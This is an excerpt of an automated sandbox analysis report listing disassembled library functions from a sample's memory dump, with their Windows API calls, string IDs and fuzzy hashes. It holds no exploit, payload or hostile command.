                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a07a8dc3e0ec1e300a4d59d60632c4f86cfb8fa1aab3f5e96356922c57fca293
                                                                                                        • Instruction ID: ba939479f131a85c7fd220ff55aa98e59352b98fb132a986d5a5ec2192433d6a
                                                                                                        • Opcode Fuzzy Hash: a07a8dc3e0ec1e300a4d59d60632c4f86cfb8fa1aab3f5e96356922c57fca293
                                                                                                        • Instruction Fuzzy Hash: 2FF03032A11324DFDB26D74CC805A5973E8EB49B55F1560A7E509F7151C6B4DE00C7C5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E8A090 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                        • Instruction ID: 595327c2370885f9efc84aa3c39ed01e8c237859b224218cd1d1f1f2ecebcb9f
                                                                                                        • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                        • Instruction Fuzzy Hash: 29E08632A11238EBC715EBC8C504949F3ECEB44B40B1504A6F509E3101C270DE00C7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E7B54A Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                        • Instruction ID: 17bd65c07829a9363480a6b2fdf4383a0f4480b48f6ed4e95e3c4cf45b8d7d60
                                                                                                        • Opcode Fuzzy Hash: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                        • Instruction Fuzzy Hash: D1C08C3420090086CE2AD92092713A8339AA395F8AF9824CED40E1B752C62EDC82D701
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DB76D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 390libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Advapi32.dll,CA4F4AE5,?,00000000), ref: 00DB7761
                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00DB778F
                                                                                                          • Part of subcall function 00C9A9B0: RtlAllocateHeap.NTDLL(?,00000000,?,CA4F4AE5,00000000,00E97E40,000000FF,?,?,00F8717C,?,00C911E6,80004005,CA4F4AE5,?,00E9A90F), ref: 00C9A9FA
                                                                                                        • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00DB77A5
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00DB77BE
                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00DB77CB
                                                                                                        • GetLastError.KERNEL32 ref: 00DB79B9
                                                                                                        • GetLastError.KERNEL32 ref: 00DB7A1E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                                                        • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                        • API String ID: 3460774402-1129428314
                                                                                                        • Opcode ID: 6037dd2de72a86fe6b0eec550c2531bad04365e9f7f89a8e3217e82ad5e207f3
                                                                                                        • Instruction ID: 19209f3e41d0a47558ceebe5755f050395d951b581903d43c8da0d3a33b9cf2f
                                                                                                        • Opcode Fuzzy Hash: 6037dd2de72a86fe6b0eec550c2531bad04365e9f7f89a8e3217e82ad5e207f3
                                                                                                        • Instruction Fuzzy Hash: 83F14AB1C05209EFDB10DF94C945BEEBBB4FF44310F244219E919B7280E774AA59CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C9EED0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 233libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00C9EEDE
                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00C9EEE4
                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00C9EF17
                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00C9EF1D
                                                                                                        • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00F072AC,00000000,00000000,00000000), ref: 00C9F03D
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00C9F086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                                                        • API String ID: 2574300362-2454113998
                                                                                                        • Opcode ID: c84b65ba093c06bae35c7a19c1acf087747f97366b9547991efb78558336d38e
                                                                                                        • Instruction ID: bd1d9012c98bd07f385d63b325f58fd8d181744f98f3527a0037857ca3e894b1
                                                                                                        • Opcode Fuzzy Hash: c84b65ba093c06bae35c7a19c1acf087747f97366b9547991efb78558336d38e
                                                                                                        • Instruction Fuzzy Hash: 20918E31D00209EFDF14DFB8D899BADB7B5AF58304F24812DE421E7291EB70AA45DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA6B00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(00F9699C,CA4F4AE5,00000000,?,?,?,?,?,?,00CA632E,00E9B45D,000000FF), ref: 00CA6B3D
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00CA6BB8
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00CA6C5E
                                                                                                        • LeaveCriticalSection.KERNEL32(00F9699C), ref: 00CA6CB3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                        • String ID: 0$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                        • API String ID: 3727441302-283551416
                                                                                                        • Opcode ID: 9cf4234a11064e7929ce1b1f7bcc6b76e898bc311c267f8f5ea424e30e9e7d32
                                                                                                        • Instruction ID: f76c1c7fa7c047a41745ca9267efe0effd984b1d3766537ae9429f6b50171120
                                                                                                        • Opcode Fuzzy Hash: 9cf4234a11064e7929ce1b1f7bcc6b76e898bc311c267f8f5ea424e30e9e7d32
                                                                                                        • Instruction Fuzzy Hash: 6A51F6B1C0121D9FDB11CFA4DD447EEBBF8BB08318F14012AE515B7291EBB55A099BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E7AA27 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldiv
                                                                                                        • String ID: :$f$f$f$p$p$p
                                                                                                        • API String ID: 3732870572-1434680307
                                                                                                        • Opcode ID: 3b65c5932bf440d7ad3596d66a5a4aba67dfb1bbbd0858029a693efee8d38b20
                                                                                                        • Instruction ID: 61f2e26319fe40488f2c5de52cbd462533f1fcebcb0207be0fa2225186cf0549
                                                                                                        • Opcode Fuzzy Hash: 3b65c5932bf440d7ad3596d66a5a4aba67dfb1bbbd0858029a693efee8d38b20
                                                                                                        • Instruction Fuzzy Hash: C50270B5A00219DBDF388F64D4446EEB7B6FF80B18FA8D125E4197B284D7308E85CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C92830 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00F91668,00000000,CA4F4AE5,00000000,00ED7E63,000000FF,?,CA4F4AE5), ref: 00C929A3
                                                                                                        • GetLastError.KERNEL32(?,CA4F4AE5), ref: 00C929AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                        • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                        • API String ID: 439134102-34576578
                                                                                                        • Opcode ID: 9e1864e89c51c7f4b23dc8c3c9fddca39a4add7b719c92175029e994688ba007
                                                                                                        • Instruction ID: 1d91ec704d4aaeb6832e563303fed00bac366a1ba425ee9f8962174e45802efe
                                                                                                        • Opcode Fuzzy Hash: 9e1864e89c51c7f4b23dc8c3c9fddca39a4add7b719c92175029e994688ba007
                                                                                                        • Instruction Fuzzy Hash: 9151D3B2D01209EBCB00CFA5DC097AE7BF4FB08710F14462AE825A7381E7759A08DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E89953 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00E89A60,0000000D,00CA079C,00000001,00000000,0000000B,?,00E89CCA,00000021,FlsSetValue,00F00E8C,00F00E94,00000001), ref: 00E89A14
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3664257935-537541572
                                                                                                        • Opcode ID: 56f1b0a824a4e09d5760500dab53a71e689a216ae05833243be69face366e185
                                                                                                        • Instruction ID: 29873b7f485797aeba1f42ec8d1cc4de88c2330abbc0683f78a673eed5e0fbd5
                                                                                                        • Opcode Fuzzy Hash: 56f1b0a824a4e09d5760500dab53a71e689a216ae05833243be69face366e185
                                                                                                        • Instruction Fuzzy Hash: 40212732E01214EBD722BB65DC81ABA7768AB817A4F385155ED0EB72D2DB30ED01C7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA9AF0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 245COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(00F9699C,CA4F4AE5,00000000,00F969B8), ref: 00CA9C43
                                                                                                        • LeaveCriticalSection.KERNEL32(00F9699C), ref: 00CA9CA8
                                                                                                        • LoadCursorW.USER32(00C90000,00000000), ref: 00CA9D04
                                                                                                        • LeaveCriticalSection.KERNEL32(00F9699C), ref: 00CA9D9B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                        • String ID: ATL:%p
                                                                                                        • API String ID: 2080323225-4171052921
                                                                                                        • Opcode ID: 00383fd45db27d4488e5a338eb96ac6ef01bef1c5714d6b3bc9f0fa955a9d054
                                                                                                        • Instruction ID: 074fbaa9c5be693d2bed2a5b2db98175e0b2cd2a5d4dad2541d0b34c98808f72
                                                                                                        • Opcode Fuzzy Hash: 00383fd45db27d4488e5a338eb96ac6ef01bef1c5714d6b3bc9f0fa955a9d054
                                                                                                        • Instruction Fuzzy Hash: 5C91FE71D04749CBDB20CF68D941BAAF7F4FF49324F10862EE866A3690E771A984CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E7B56C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA4F4AE5,00000001,?,00000000,00EFA459,000000FF,?,00E7B4FC,?,?,00E7B4D0,00000016), ref: 00E7B5A1
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E7B5B3
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00EFA459,000000FF,?,00E7B4FC,?,?,00E7B4D0,00000016), ref: 00E7B5D5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 4e59182635e00f61299f9618cf028a473d40cad0ec1faaeb49eb2b75cadad0dd
                                                                                                        • Instruction ID: cf09802d35ef5784e0c710b901ab47fc3dcd03b1ec5cd165a6d5b3f86237f219
                                                                                                        • Opcode Fuzzy Hash: 4e59182635e00f61299f9618cf028a473d40cad0ec1faaeb49eb2b75cadad0dd
                                                                                                        • Instruction Fuzzy Hash: 4601A23194065EEFDB019B91DD05BBEBBB9FB44B14F204626F915F22E0DB749904CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DB5040 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00DB5074
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00DB5096
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00DB50BE
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00DB51A7
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00DB51D1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                        • String ID:
                                                                                                        • API String ID: 459529453-0
                                                                                                        • Opcode ID: 8d4b3ef22492025e5e11bb7498fd77eda053f0b6f88217b92cc26f93bdae6b11
                                                                                                        • Instruction ID: 514d2c21f72e2d0001926875c69d056dd1295d10b16868bccbd294f3842adb60
                                                                                                        • Opcode Fuzzy Hash: 8d4b3ef22492025e5e11bb7498fd77eda053f0b6f88217b92cc26f93bdae6b11
                                                                                                        • Instruction Fuzzy Hash: 8E518D70A04648DFDB11DF58E841BAEBBF4FB00394F248159E456AB381DBB5AE05CBE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA0B20 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CA0B6A
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00CA0B70
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00CA0B93
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00E99C66,000000FF), ref: 00CA0BBB
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00E99C66,000000FF), ref: 00CA0BC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess$FormatMessage
                                                                                                        • String ID:
                                                                                                        • API String ID: 1606019998-0
                                                                                                        • Opcode ID: 9a39aad3d0125bbc41acc6acd437635da08ea91fcd0a16f5db8119ce94b77a7b
                                                                                                        • Instruction ID: 4749d2862991c03e679501ae1c03597ba6e1c89e3471b42eac2275f6e32f60c7
                                                                                                        • Opcode Fuzzy Hash: 9a39aad3d0125bbc41acc6acd437635da08ea91fcd0a16f5db8119ce94b77a7b
                                                                                                        • Instruction Fuzzy Hash: 691163B1A44219ABEB00DFA4DD05FAFBBF8EB04B44F104519F510BB2C1D7B56A048BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00C9D4FE Relevance: 7.5, APIs: 5, Instructions: 46synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 590199018-0
